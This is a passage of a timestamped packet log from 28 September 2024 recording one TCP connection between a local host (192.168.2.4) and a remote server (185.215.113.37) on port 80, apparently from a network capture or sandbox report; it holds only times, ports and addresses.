Sep 28, 2024 07:32:05.728699923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728715897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728734016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728743076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728768110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728779078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728862047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728877068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728923082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728928089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728962898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.728971958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.728996992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729008913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729031086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729039907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729063988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729074955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729104042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729106903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729139090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729149103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729182005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729185104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729219913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729226112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729249001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729259968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729286909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729299068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729341984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729347944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729378939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729394913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729403973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729412079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729418993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729444981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729460001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729476929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729489088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729510069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729540110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729542971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729548931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729584932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729660034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729691982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729705095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729726076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729733944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729764938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729777098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729800940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729810953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729835033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729842901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729878902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.729888916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.729934931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730035067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730067968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730081081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730098963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730130911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730143070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730164051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730187893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730196953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730216026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730230093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730242014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730262995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730273008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730297089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730307102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730329990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730341911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730362892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730370998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730396032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730406046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730431080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730436087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730473995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730706930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730740070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730755091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730772018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730782032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730813980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730827093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730859995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730870962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730891943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730902910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730925083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730933905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730958939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.730971098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.730990887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731007099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731019974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731034040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731053114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731060982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731096029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731116056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731127977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731159925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731192112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731224060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731255054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731256962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731256962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731256962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731256962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731286049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731301069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731301069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731322050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731333017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731364012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731564045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731610060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731612921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731647015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731657982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731678963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731688023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731713057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731724977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731746912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731755972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731780052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731791973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731810093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731822968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731843948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731863976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731877089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731888056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731908083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731920004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731944084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.731950998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.731987000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.732003927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.732049942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770127058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770143986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770160913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770173073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770236015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770256996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770267963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770277977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770288944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770288944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770309925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770325899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770437002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770478964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770493984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770534039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770571947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770582914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770592928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770615101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770639896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770791054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770807981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770817995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770828009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770831108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770838022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770848989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770849943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770860910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.770874977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770884037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.770911932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:06.370707035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:06.370707989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:06.376065969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:06.376136065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:06.376163960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:06.376190901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:06.376219988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.105274916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.105343103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:07.178433895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:07.178494930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:07.183294058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.183378935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.183459044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.906405926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:07.906542063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:07.921809912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:07.926680088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:08.647049904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:08.647233009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:08.996963978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:09.002087116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:09.711899996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:09.711958885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:09.936177969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:09.941157103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159491062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159508944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159518003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159543037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159554005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159564972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159562111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159575939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159635067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159635067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159759045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159770012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159780025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159801006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159828901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159877062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159888983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159898996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.159914017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.159930944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288717985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288732052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288743973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288783073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288803101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288815022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288826942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288841963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288851023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288857937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288862944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.288882017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288906097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.288996935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289009094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289068937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289159060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289170027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289174080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289181948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289194107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289206028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289232016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289427042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289438009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289448023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289458036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289468050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289477110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289478064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289489985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289495945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289501905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289513111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289519072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289526939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289535046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289566994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.289808989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.289864063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.417679071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417704105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417712927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417752981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417841911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417851925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417886019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417979002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.417979002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.417979002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.417984009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.417995930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418008089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418035984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418051958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418154955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418164968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418195963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418200970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418212891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418215036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418241024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418283939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418375015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418385029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418394089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418407917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418417931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418418884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418428898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418438911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418456078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418479919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418639898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418651104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418682098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418792963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418802977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418812990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418823004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418832064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418834925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418843985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418854952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418855906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418864012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418868065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418875933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.418904066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.418926001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.419251919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419262886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419272900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419282913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419292927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419296980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.419302940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419313908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419323921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419325113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.419334888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419343948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:10.419343948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.419372082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:10.419394016 CEST	49730	80	192.168.2.4	185.215.113.37
